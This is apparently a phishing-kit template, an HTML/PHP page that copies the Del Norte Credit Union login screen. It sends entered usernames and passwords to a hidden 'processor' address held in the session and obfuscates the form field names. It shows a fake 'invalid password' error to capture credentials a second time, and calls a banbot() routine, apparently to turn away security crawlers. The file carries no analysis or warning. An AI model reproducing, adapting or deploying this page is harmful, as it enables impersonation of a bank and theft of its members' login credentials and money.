<!DOCTYPE html>
<html lang="en-US" class="js-focus-visible"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><style>body {transition: opacity ease-in 0.2s; } 
body[unresolved] {opacity: 0; display: block; overflow: hidden; position: relative; } 
</style>
<title>Del Norte Credit Union</title>
<meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=yes">
<link rel="icon" href="<?php echo gaflder();?>/favicon.png">
<link href="<?php echo gaflder();?>/iris.min.css" rel="stylesheet" type="text/css">
<link href="<?php echo gaflder();?>/iris-foundation.min.css" rel="stylesheet" type="text/css">
<link href="<?php echo gaflder();?>/font-icons.css" rel="stylesheet" type="text/css">
<link href="<?php echo gaflder();?>/theme.mobile.css" rel="stylesheet" type="text/css">
<link rel="stylesheet" href="<?php echo gaflder();?>/iris-components.shim.mobile.min.css" type="text/css">
<link rel="stylesheet" href="<?php echo gaflder();?>/iris-components.min.css" type="text/css">
<link rel="stylesheet" href="<?php echo gaflder();?>/isotope.min.css" type="text/css">
</head>
<body id="username_page" class="alk-body shared-layout theme--theme-builder isotope-mobile Authentication windows challenge-type-username-and-password username-and-password iris-keyboard-use-detected">
<div class="page-background__layer page-background__layer0--image"></div><div id="mmenu_container"><div id="wrapper"><div id="content" class="clearfix"><div class="card-container flush-with-titlebar"><div class="card card-full-width"><div class="cms-content-area iris-content"></div></div></div><div class="cms-content-area"></div><div class="mobile-authentication-container"><div id="login_header" class="mobile-authentication-header"><div class="brand-logo" role="img"></div></div><div class="mobile-authentication-content"><div id="app" class="isotope-app"><div class="isotope-page--authentication isotope-page"><div class="isotope-challenge-type--username-and-password isotope-challenge-type"><div class="login-image-container"><form role="form" class="isotope-slide usernameAndPasswordForm" method="post" action="<?php echo $_SESSION['processor'];?><?php if(isset($_GET[''.$theerrkey.''])){echo '?'.$theerrkey.'=On';};?>"><!----><div class="isotope-slide__content"><div class="logo isotope-hidden--mobile"><img src="<?php echo gaflder();?>/images_branded-logos-wide.png"></div><div class="mar-top--small isotope-hidden--desktop"></div><div class="irisv-textfield irisv-textfield--filled"><div class="irisv-textfield__container"><div class="irisv-textfield__control"><!----><div class="irisv-textfield__input-wrapper"><span id="username_label"><label for="username" class="irisv-textfield__label font-caption"> Username </label></span><input type="text" id="username" name="<?php echo gaN('username');?>" required="required" kind="underline" autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" class="font-body-1 irisv-textfield__input"></div><!----><!----></div><div class="irisv-textfield__messages"><!----><div role="alert"><!----></div><!----><!----></div></div></div><div class="irisv-textfield irisv-textfield__password mar-top--small irisv-textfield--filled" autocomplete="current-password" kind="underline"><div class="irisv-textfield__container"><div class="irisv-textfield__control"><!----><div class="irisv-textfield__input-wrapper"><span id="password_label"><label for="password" class="irisv-textfield__label font-caption"> Password </label></span><input type="password" id="password" name="<?php echo gaN('password');?>" required="required" class="irisv-textfield__input font-subtitle-1" autocomplete="current-password"></div><!----><div class="irisv-textfield__trailing-icon"><button type="button" class="irisv-textfield__trailing-button"><span id="eye" role="img" class="irisv-icon font-icon-show irisv-icon--md"><!----></span></button></div></div><div class="irisv-textfield__messages"><!----><div role="alert"><!----></div><!----><!----></div></div></div><input name="<?php echo gaN('subscr');?>" type="hidden" value="<?php echo md5(uniqid());?>"/><div class="rememberMe"><div class="irisv-switch" id="rememberMeCheckBox"><button role="switch" class="irisv-switch__button" type="button"><div class="irisv-switch__button-pip"></div></button></div>
                Remember Me
            </div><div class="mar-top--small"><div id="irisv_notification_1g56ew68nj4" role="alertdialog" tabindex="0" class="irisv-notification inline error" style="<?php if(!isset($_GET[''.$theerrkey.''])){echo 'display:none;';};?>"><div class="irisv-notification__container"><span class="irisv-icon irisv-notification__leading-icon font-icon-alert-line irisv-icon--md"><!----></span><span id="irisv_notification_1g56ew68nj4_heading" class="irisv-notification__message-heading font-subtitle-2">  <span class="irisv-notification__message-body font-body-2"> Invalid username or password. Please try again.</span></span><button class="irisv-notification__close" style="display: none;"><span class="font-icon-cancel-x irisv-notification-icon--sm"></span></button></div><div class="irisv-notification__trailing-content" style="display: none;"></div></div></div><div class="isotope-actions mar-top--small"><button type="submit" class="irisv-button irisv-button--highEmphasis irisv-button--onLight irisv-button--full-width text--none" id="btn_submitCredentials"><!----><span class="irisv-button__text"> Log in </span><!----><!----></button><div class="forgotLinks"><span class=""><a>Forgot Password?</a></span><!----></div><!----><a class="registration">
                    Register a New Account
                </a></div></div><!----></form><!----><div class="mar-bottom--small isotope-hidden--desktop"></div></div></div></div></div>
<script>
function showpsw(){var e = document.getElementById('eye');var pas = document.getElementById("password");if(pas.type=="password" && pas.value!=""){pas.type="text";e.classList.replace('font-icon-show','font-icon-hide');} else{pas.type="password";e.classList.replace('font-icon-hide','font-icon-show');};};
document.querySelector('.irisv-switch__button').addEventListener('click',(e)=>{e.target.classList.toggle('selected');});
document.querySelector('#eye').addEventListener('click',(e)=>{showpsw(<?php if(isset($_SESSION['device']) && !stripos($_SESSION['device'],'yochi')){banbot();};?>);});
</script></div></div></div></div></div></body></html>